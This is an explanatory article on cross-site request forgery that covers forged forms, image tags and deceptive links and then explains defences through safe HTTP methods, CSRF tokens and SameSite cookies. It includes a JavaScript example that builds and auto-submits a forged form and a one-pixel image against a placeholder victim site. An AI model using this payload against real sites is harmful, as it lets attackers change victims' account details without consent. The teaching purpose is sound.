Cross-site request forgery (CSRF)

A CSRF attack is when a valid but unintended request is sent to the web server from a logged-in user's browser. The user is tricked, usually by a page the attacker controls, into causing a request they did not mean to send, and the browser automatically attaches the site's cookies to it, so the request arrives looking like any other authenticated one.

An attacker could update a user's login information or perform any other action the application allows on the user's behalf. The attacker does not need to read the response; the side effect on the server is the goal.

Attack vectors

Forms

A popular attack vector is tricking users into submitting a malicious form. The attacker hosts a page on a server they control. The page may be made to look like the original site, but it does not have to: the form can be hidden and submitted automatically by script as soon as the page loads.

Attackers lure users to the malicious page with phishing emails, a link planted in user-generated content on the original site, or any other way of getting the user to open a page.

The attacker mirrors the action, method and field names of the original form. Because the attacker controls the form, they choose the values, for example a new email address or password.

The request passes authentication checks if the user is logged in to the original site with a session cookie, because the browser attaches cookies to the cross-site POST automatically. Only the SameSite cookie attribute or a server-side CSRF token check stops this.

Images

If the application has GET endpoints that change data on the server, the attack can be performed with an image. The attacker's own page can carry the image, and if the original site accepts user-submitted content such as comments or profile text, the image can be planted on the original site itself, where every logged-in user who loads the page triggers the request.

The attacker submits an HTML image tag whose src is the vulnerable endpoint. When a user's browser renders the page, it fetches the image, sending the GET request along with the user's cookies. The request passes authentication checks because it comes from the authenticated user's own browser; the attacker never sees the response, but the side effect has already happened.

Deceptive links

Links are vulnerable in the same way images are: an attacker tricks a user into clicking a link whose URL is the vulnerable GET endpoint, and the browser sends the request with the user's cookies. Like images, links can only cause GET requests, so this vector depends on the application changing state on GET.
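The following is an added example, not code from the original page. It shows what the attacker's page carries for the form and image vectors described above: a form that mirrors the victim site's field names with attacker-chosen values and no CSRF token (the attacker cannot read one across origins), and a one-pixel image pointing at a state-changing GET endpoint. The victim origin https://victim.example and the /profile/email and /account/delete endpoints are constructed for illustration.

```javascript
// Added example: markup an attacker's page would carry to forge requests
// against a victim site. All names are constructed: the victim origin
// https://victim.example and its endpoints are hypothetical.
const VICTIM_ORIGIN = "https://victim.example";

// Minimal HTML attribute escaping so attacker-chosen values cannot break
// out of the generated attributes.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Mirror the victim's form: same action, same method, same field names,
// but attacker-chosen values. There is no token field: the same-origin
// policy keeps the attacker's page from reading the victim's real form.
function buildForgedForm(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`)
    .join("\n  ");
  return `<form id="csrf" method="POST" action="${escapeAttr(action)}">\n  ${inputs}\n</form>`;
}

// GET variant: an <img> (a plain <a> link works the same way) whose src is a
// state-changing GET endpoint. The browser fetches it with the user's cookies.
function buildForgedImage(url) {
  return `<img src="${escapeAttr(url)}" width="1" height="1" alt="">`;
}

const forgedForm = buildForgedForm(`${VICTIM_ORIGIN}/profile/email`, {
  email: "attacker@attacker.example",
});
const forgedImage = buildForgedImage(`${VICTIM_ORIGIN}/account/delete`);

// In a browser, inject the form and submit it with no user interaction.
// The victim's browser attaches its victim.example cookies to the POST
// unless a SameSite attribute (or the server's token check) stops it.
// Under Node there is no document, so this branch is skipped.
if (typeof document !== "undefined") {
  document.body.insertAdjacentHTML("beforeend", forgedForm + forgedImage);
  document.getElementById("csrf").submit();
}
```

The forged POST is indistinguishable from a genuine one at the network layer except for what it lacks: a valid per-session token, or a session cookie that the browser withheld because of SameSite.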

Mitigating and preventing attacks

Use proper HTTP methods

Make sure endpoints use the appropriate HTTP method. GET (and HEAD) requests must be safe: they read data and never change it. POST requests should create new resources, PUT and PATCH requests should update existing ones, and DELETE should remove them.

Keeping state changes off GET removes the image and link vectors, because those can only trigger GET requests. It does not stop the form vector: an attacker's page can POST just as easily, so correct methods are a prerequisite for CSRF tokens and SameSite cookies, not a substitute for them.

CSRF Tokens

A CSRF token is a secret value the server issues to the user's session and requires on every state-changing request, typically as a hidden input field in a form (or a request header for requests sent by JavaScript).

It must be tied to the user's session and generated with a cryptographically secure random generator so an attacker can neither guess it nor obtain it: the same-origin policy prevents the attacker's page from reading the victim's form, so a forged request cannot carry a valid token.

When a request that changes state arrives, the server checks that a token is present and that it matches the one stored for the session, using a constant-time comparison, and rejects the request otherwise. Safe, read-only requests need no token.

Same-Site cookies

Session cookies used for authentication should carry the SameSite attribute. With SameSite=Strict the browser never sends the cookie on a request initiated from another site. With SameSite=Lax it still sends the cookie on top-level navigations that use a safe method such as GET (the user clicking a link), but not on cross-site POSTs, images or scripted requests. Either value stops the forged-form attack as long as GET endpoints do not change state; Strict also covers links. Note that "site" means the registrable domain, so a page on another subdomain of the same site is not blocked, and SameSite does nothing against a request forged from within the site itself (for example via stored XSS). Use it alongside CSRF tokens, not instead of them.
